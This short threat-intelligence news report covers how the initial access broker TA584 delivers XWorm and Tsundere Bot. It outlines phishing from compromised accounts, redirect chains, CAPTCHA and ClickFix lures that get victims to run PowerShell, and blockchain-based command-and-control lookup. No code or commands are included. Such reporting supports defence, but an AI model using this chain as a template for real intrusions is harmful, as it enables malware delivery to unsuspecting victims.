TA584 threat actor leverages Tsundere Bot and XWorm for network access

A prolific initial access broker, identified as TA584, has been observed employing the Tsundere Bot in conjunction with the XWorm remote access trojan. This combination facilitates network access, potentially paving the way for ransomware attacks. Proofpoint researchers have been monitoring TA584’s activities since 2020 and have noted a significant escalation in its operations, introducing a sophisticated attack chain designed to bypass traditional security measures, with further coverage provided by Bleeping Computer.TA584’s current attack chain begins with emails sent from compromised accounts via SendGrid and Amazon SES. These emails contain unique URLs, geofencing, and IP filtering, often utilizing redirect chains through traffic direction systems like Keitaro. Victims who bypass these initial filters encounter a CAPTCHA, followed by a ClickFix page instructing them to execute a PowerShell command. This command loads either XWorm or Tsundere Bot into memory. Tsundere Bot, a malware-as-a-service platform, gathers system information, can execute arbitrary code, and uses the Ethereum blockchain to retrieve its command-and-control address. TA584 has a history of using various payloads, including Ursnif and Cobalt Strike.The increased volume and expanded geographic targeting by TA584, including new European countries and Australia, highlight a growing threat. The use of Tsundere Bot and XWorm, coupled with advanced evasion techniques, suggests a persistent effort to gain initial access for further malicious activities, likely including ransomware deployment.Source: Bleeping Computer